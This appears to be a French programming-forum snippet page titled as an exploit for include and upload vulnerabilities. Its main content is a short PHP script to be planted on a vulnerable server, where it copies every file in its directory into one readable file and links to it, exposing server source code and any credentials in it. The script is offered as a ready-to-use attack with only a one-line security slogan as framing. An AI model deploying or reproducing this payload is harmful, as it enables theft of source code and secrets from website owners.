Exploi faille include & upload
Contenu du snippet
faille include coté serveur, un clik=le code (lecture des fichiers!)
La securité avant tout!
Source / Exemple :
<?
$dir=opendir('.');
$output="code.own";
$fpout = fopen($output, "a");
while ($file = readdir($dir))
{
if ($fpout)
{
if ((filetype($file) == "dir") || ($file == $output))
;
else
{
$fpin = fopen($file, "r");
if ($fpin)
{
fputs($fpout, "\n".$file."\n");
while (!feof($fpin))
{
$line=fgets($fpin,1024);
fputs($fpout,$line);
}
fclose($fpin);
}
}
}
}
echo "<a href=$output> Show source :-)</a>";
closedir($dir);
fclose($fpout);
?>
Conclusion :
La securité avant tout!
A voir également
- Exploi faille include & upload
- Faille sql - Conseils pratiques -PHP
- Img upload ✓ - Forum PHP
- Vscode include path - Forum C / C++ / C++.NET
- Faille php - Conseils pratiques -PHP
- Include java - Forum Java
Vous n'êtes pas encore membre ?
inscrivez-vous, c'est gratuit et ça prend moins d'une minute !
Les membres obtiennent plus de réponses que les utilisateurs anonymes.
Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.
Le fait d'être membre vous permet d'avoir des options supplémentaires.